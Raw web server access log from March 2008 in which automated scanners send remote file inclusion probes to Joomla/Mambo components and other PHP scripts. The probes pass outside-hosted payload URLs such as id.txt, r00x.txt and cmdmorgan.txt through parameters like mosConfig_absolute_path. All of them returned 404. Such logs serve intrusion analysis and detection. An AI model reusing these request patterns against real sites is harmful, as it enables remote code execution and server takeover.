72.9.145.111 - - [23/Mar/2008:06:26:01 -0700] "GET /logs/access_080211.log//modules/TotalCalendar/about.php?inc_dir=http://www.forgotten-brotherhood.de/cache/green2.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.26.54.6 - - [23/Mar/2008:06:26:01 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://qensch.freehostia.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.115.213.247 - - [23/Mar/2008:06:26:01 -0700] "GET /logs/homepage.php?sel=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.193.223.44 - - [23/Mar/2008:06:26:10 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.freewebtown.com/crxr/cp?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
213.193.223.44 - - [23/Mar/2008:06:26:11 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.freewebtown.com/perocs/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
213.193.223.44 - - [23/Mar/2008:06:26:12 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.freewebtown.com/crxr/cp?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
213.193.223.44 - - [23/Mar/2008:06:26:12 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.freewebtown.com/perocs/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
207.162.215.10 - - [23/Mar/2008:06:26:14 -0700] "GET /logs/access_080127.log/scanhttp://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.86.167.140 - - [23/Mar/2008:06:26:29 -0700] "GET /logs/access_080312.log/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
80.86.167.140 - - [23/Mar/2008:06:26:30 -0700] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
59.125.179.215 - - [23/Mar/2008:06:26:30 -0700] "GET /logs/access_071229.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.86.167.140 - - [23/Mar/2008:06:26:30 -0700] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
59.125.179.215 - - [23/Mar/2008:06:26:30 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.125.179.215 - - [23/Mar/2008:06:26:31 -0700] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.75.204.128 - - [23/Mar/2008:06:27:01 -0700] "GET /logs/access_080312.log/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.woopss.de/conf/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
62.75.204.128 - - [23/Mar/2008:06:27:01 -0700] "GET /logs/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.woopss.de/conf/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
218.83.155.102 - - [23/Mar/2008:06:27:32 -0700] "GET /logs/access_080219.log//main.php?sayfa=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
218.83.155.102 - - [23/Mar/2008:06:27:32 -0700] "GET //main.php?sayfa=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
218.83.155.102 - - [23/Mar/2008:06:27:32 -0700] "GET /logs//main.php?sayfa=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
72.30.216.102 - - [23/Mar/2008:06:27:41 -0700] "GET /logs/access_080117.log HTTP/1.0" 200 655360 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
72.9.145.111 - - [23/Mar/2008:06:28:06 -0700] "GET /logs/access_080129.log//skin/zero_vote/error.php?dir==http://www.malteser-menden.de/images/stories/frut/r00x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.9.145.111 - - [23/Mar/2008:06:28:06 -0700] "GET /logs/access_080129.log//skin/zero_vote/error.php?dir=http://www.forgotten-brotherhood.de/cache/green2.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.9.145.111 - - [23/Mar/2008:06:28:06 -0700] "GET //skin/zero_vote/error.php?dir==http://www.malteser-menden.de/images/stories/frut/r00x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
190.1.0.16 - - [23/Mar/2008:06:28:06 -0700] "GET //index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.idowebhosting.net/catalog/includes/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.9.145.111 - - [23/Mar/2008:06:28:06 -0700] "GET //skin/zero_vote/error.php?dir=http://www.forgotten-brotherhood.de/cache/green2.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.9.145.111 - - [23/Mar/2008:06:28:06 -0700] "GET /logs//skin/zero_vote/error.php?dir==http://www.malteser-menden.de/images/stories/frut/r00x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.9.145.111 - - [23/Mar/2008:06:28:06 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.forgotten-brotherhood.de/cache/green2.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.110.209.230 - - [23/Mar/2008:06:28:10 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
59.125.179.215 - - [23/Mar/2008:06:28:16 -0700] "GET /logs/access_080211.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.47.247.136 - - [23/Mar/2008:06:28:48 -0700] "GET /logs/access_080126.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.tecnicsuport.com/dades/gestiobanners/special.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.225.219.10 - - [23/Mar/2008:06:28:48 -0700] "GET /logs/access.log//skin/zero_vote/ask_password.php?dir=http://www1.gars.at/wirtschaft/modules/poll/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.225.219.10 - - [23/Mar/2008:06:28:49 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www1.gars.at/wirtschaft/modules/poll/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.225.219.10 - - [23/Mar/2008:06:28:49 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www1.gars.at/wirtschaft/modules/poll/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.47.247.136 - - [23/Mar/2008:06:28:49 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.tecnicsuport.com/dades/gestiobanners/special.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.47.247.136 - - [23/Mar/2008:06:28:50 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.tecnicsuport.com/dades/gestiobanners/special.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.225.219.10 - - [23/Mar/2008:06:29:07 -0700] "GET /logs/access_080124.log//skin/zero_vote/ask_password.php?dir=http://www1.gars.at/wirtschaft/modules/poll/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.9.145.111 - - [23/Mar/2008:06:29:22 -0700] "GET /logs/access_071229.log//login.php?dir==http://www.malteser-menden.de/images/stories/frut/r00x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.9.145.111 - - [23/Mar/2008:06:29:22 -0700] "GET /logs/access_071229.log//login.php?dir=http://www.forgotten-brotherhood.de/cache/green2.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.9.145.111 - - [23/Mar/2008:06:29:23 -0700] "GET //login.php?dir==http://www.malteser-menden.de/images/stories/frut/r00x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.9.145.111 - - [23/Mar/2008:06:29:23 -0700] "GET //login.php?dir=http://www.forgotten-brotherhood.de/cache/green2.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.9.145.111 - - [23/Mar/2008:06:29:23 -0700] "GET /logs//login.php?dir==http://www.malteser-menden.de/images/stories/frut/r00x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.9.145.111 - - [23/Mar/2008:06:29:23 -0700] "GET /logs//login.php?dir=http://www.forgotten-brotherhood.de/cache/green2.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.98.59.114 - - [23/Mar/2008:06:29:23 -0700] "GET /logs/access_080306.log/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.98.59.114 - - [23/Mar/2008:06:29:23 -0700] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.98.59.114 - - [23/Mar/2008:06:29:23 -0700] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.75.204.128 - - [23/Mar/2008:06:29:29 -0700] "GET /logs/access.log/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.woopss.de/conf/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
211.115.213.247 - - [23/Mar/2008:06:29:44 -0700] "GET /logs/access_080213.log//www/administrator/components/com_remository/admin.remository.phphttp://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.115.213.247 - - [23/Mar/2008:06:29:45 -0700] "GET //www/administrator/components/com_remository/admin.remository.phphttp://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.115.213.247 - - [23/Mar/2008:06:29:49 -0700] "GET /logs//www/administrator/components/com_remository/admin.remository.phphttp://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.17.200.74 - - [23/Mar/2008:06:29:51 -0700] "GET /admin/cron_pop.php?adm_path=http://www.motoxclub.org.au/forum/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
85.17.200.74 - - [23/Mar/2008:06:29:51 -0700] "GET /logs/admin/cron_pop.php?adm_path=http://www.motoxclub.org.au/forum/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
203.172.184.72 - - [23/Mar/2008:06:29:54 -0700] "GET /logs/access_080312.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.tecnicsuport.com/dades/gestiobanners/special.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.9.145.111 - - [23/Mar/2008:06:29:55 -0700] "GET /logs/access_080120.log//skin/zero_vote/error.php?dir==http://www.malteser-menden.de/images/stories/frut/r00x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.9.145.111 - - [23/Mar/2008:06:29:56 -0700] "GET /logs/access_080120.log//skin/zero_vote/error.php?dir=http://www.forgotten-brotherhood.de/cache/green2.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.15.6.5 - - [23/Mar/2008:06:29:59 -0700] "GET /admin/cron_pop.php?adm_path=http://www.motoxclub.org.au/forum/test.txt?? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.dmulk.com"
67.15.6.5 - - [23/Mar/2008:06:29:59 -0700] "GET /logs/admin/cron_pop.php?adm_path=http://www.motoxclub.org.au/forum/test.txt?? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.dmulk.com"
203.146.251.227 - - [23/Mar/2008:06:30:04 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.freewebtown.com/crxr/cp?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
203.146.251.227 - - [23/Mar/2008:06:30:04 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.freewebtown.com/crxr/cp?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
203.146.251.227 - - [23/Mar/2008:06:30:04 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.freewebtown.com/perocs/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
203.146.251.227 - - [23/Mar/2008:06:30:05 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.freewebtown.com/perocs/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
72.9.145.111 - - [23/Mar/2008:06:30:12 -0700] "GET /logs/access_080117.log//login.php?dir==http://www.malteser-menden.de/images/stories/frut/r00x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.9.145.111 - - [23/Mar/2008:06:30:12 -0700] "GET /logs/access_080117.log//login.php?dir=http://www.forgotten-brotherhood.de/cache/green2.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
218.83.155.102 - - [23/Mar/2008:06:30:23 -0700] "GET /logs/access_080225.log//main.php?sayfa=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
81.80.108.84 - - [23/Mar/2008:06:30:39 -0700] "GET /logs//admin/cron_bounce.php?adm_path=http://www.motoxclub.org.au/forum/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
81.80.108.84 - - [23/Mar/2008:06:30:40 -0700] "GET //admin/cron_bounce.php?adm_path=http://www.motoxclub.org.au/forum/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
217.110.209.230 - - [23/Mar/2008:06:30:49 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.freewebtown.com/crxr/cp?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
217.110.209.230 - - [23/Mar/2008:06:30:52 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.freewebtown.com/crxr/cp?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
217.110.209.230 - - [23/Mar/2008:06:30:53 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.freewebtown.com/perocs/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
217.110.209.230 - - [23/Mar/2008:06:30:56 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.freewebtown.com/perocs/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
217.26.54.6 - - [23/Mar/2008:06:31:04 -0700] "GET /logs/access_080228.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://qensch.freehostia.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.195.77.225 - - [23/Mar/2008:06:31:42 -0700] "GET /logs/access_071229.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://kiliclub.com/tmp/cmdmorgan.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.195.77.225 - - [23/Mar/2008:06:31:42 -0700] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://kiliclub.com/tmp/cmdmorgan.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.86.167.140 - - [23/Mar/2008:06:31:53 -0700] "GET /logs/access_080211.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
80.86.167.140 - - [23/Mar/2008:06:32:09 -0700] "GET /logs/access_080306.log/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
65.98.59.114 - - [23/Mar/2008:06:32:33 -0700] "GET /logs/access_080312.log/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.176.226.180 - - [23/Mar/2008:06:32:39 -0700] "GET /logs/access_080313.log/components/com_performs/performs.php?mosConfig_absolute_path=http://vivace.biz/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.176.226.180 - - [23/Mar/2008:06:32:40 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://vivace.biz/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.176.226.180 - - [23/Mar/2008:06:32:40 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://vivace.biz/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.92.68.238 - - [23/Mar/2008:06:32:51 -0700] "GET /logs/access_080113.log/errors.php?error=http://www.brokencomplex.com/www?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.55.168.243 - - [23/Mar/2008:06:33:19 -0700] "GET //admin/cron_bounce.php?adm_path=http://www.motoxclub.org.au/forum/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
72.55.168.243 - - [23/Mar/2008:06:33:19 -0700] "GET /logs//admin/cron_bounce.php?adm_path=http://www.motoxclub.org.au/forum/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
190.1.0.16 - - [23/Mar/2008:06:33:52 -0700] "GET /errors.php?error=http://www.idowebhosting.net/catalog/includes/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.93.107.242 - - [23/Mar/2008:06:34:06 -0700] "GET /logs/access_080223.log/index.php?body=http://www.fonsvandenhout.nl/catalog/includes/mc22.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.107.242 - - [23/Mar/2008:06:34:06 -0700] "GET /index.php?body=http://www.fonsvandenhout.nl/catalog/includes/mc22.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.107.242 - - [23/Mar/2008:06:34:06 -0700] "GET /logs/index.php?body=http://www.fonsvandenhout.nl/catalog/includes/mc22.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.35.95.235 - - [23/Mar/2008:06:34:11 -0700] "GET /logs/access.log//index.php?_REQUEST=&_REQUEST%5boption%5d=com_kochsuite&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
200.35.95.235 - - [23/Mar/2008:06:34:11 -0700] "GET /logs/access.log//index.php?_REQUEST=&_REQUEST%5boption%5d=com_kochsuite&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
213.195.77.225 - - [23/Mar/2008:06:34:28 -0700] "GET /logs/access_080211.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://kiliclub.com/tmp/cmdmorgan.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.19.158.41 - - [23/Mar/2008:06:34:53 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.76.157.205 - - [23/Mar/2008:06:34:55 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.230.7.194 - - [23/Mar/2008:06:34:57 -0700] "GET //config.php?inc_dir=http://cdr.sugong.org/bbs//data1/alba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.25.151.27 - - [23/Mar/2008:06:35:07 -0700] "GET //vwar//convert/mvcw.php?step=1&vwar_root=http://www.landkreis.halberstadt.de/contenido-4.4.2/cms/main.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.dmulk.com"
85.25.151.27 - - [23/Mar/2008:06:35:09 -0700] "GET /logs//vwar//convert/mvcw.php?step=1&vwar_root=http://www.landkreis.halberstadt.de/contenido-4.4.2/cms/main.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.dmulk.com"
62.75.204.128 - - [23/Mar/2008:06:35:12 -0700] "GET /index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.woopss.de/conf/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.dmulk.com"
62.75.204.128 - - [23/Mar/2008:06:35:12 -0700] "GET /logs/index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.woopss.de/conf/boo.do??? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.dmulk.com"
69.93.107.242 - - [23/Mar/2008:06:35:27 -0700] "GET /logs/access_080225.log/index.php?body=http://www.fonsvandenhout.nl/catalog/includes/mc22.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.230.7.194 - - [23/Mar/2008:06:35:53 -0700] "GET //config.php?inc_dir=http://cdr.sugong.org/bbs//data1/alba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.118.102.153 - - [23/Mar/2008:06:36:27 -0700] "GET /index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.smagz.com/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
87.118.102.153 - - [23/Mar/2008:06:36:28 -0700] "GET /logs/index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.smagz.com/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
222.122.43.28 - - [23/Mar/2008:06:37:00 -0700] "GET /logs/access_080219.log//main.php?sayfa=http://www.jegonet.com/janghak/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.122.43.28 - - [23/Mar/2008:06:37:00 -0700] "GET //main.php?sayfa=http://www.jegonet.com/janghak/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.122.43.28 - - [23/Mar/2008:06:37:01 -0700] "GET /logs//main.php?sayfa=http://www.jegonet.com/janghak/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.19.158.41 - - [23/Mar/2008:06:37:34 -0700] "GET /logs/access_080131.log/scanhttp://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.19.158.41 - - [23/Mar/2008:06:37:36 -0700] "GET /scanhttp://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.19.158.41 - - [23/Mar/2008:06:37:39 -0700] "GET /logs/scanhttp://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.95.82.113 - - [23/Mar/2008:06:38:59 -0700] "GET /logs/access_080129.log/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://vortex.helloweb.eu/.help/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.95.82.113 - - [23/Mar/2008:06:39:00 -0700] "GET /administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://vortex.helloweb.eu/.help/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.95.82.113 - - [23/Mar/2008:06:39:00 -0700] "GET /logs/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://vortex.helloweb.eu/.help/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.95.82.113 - - [23/Mar/2008:06:39:40 -0700] "GET /logs/access_080306.log/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://vortex.helloweb.eu/.help/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
122.201.81.6 - - [23/Mar/2008:06:39:58 -0700] "GET /logs/access_080306.log/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
122.201.81.6 - - [23/Mar/2008:06:39:58 -0700] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
122.201.81.6 - - [23/Mar/2008:06:39:58 -0700] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
122.201.81.6 - - [23/Mar/2008:06:40:05 -0700] "GET /logs/access_080306.log/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
122.201.81.6 - - [23/Mar/2008:06:40:05 -0700] "GET /logs/access_080306.log/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
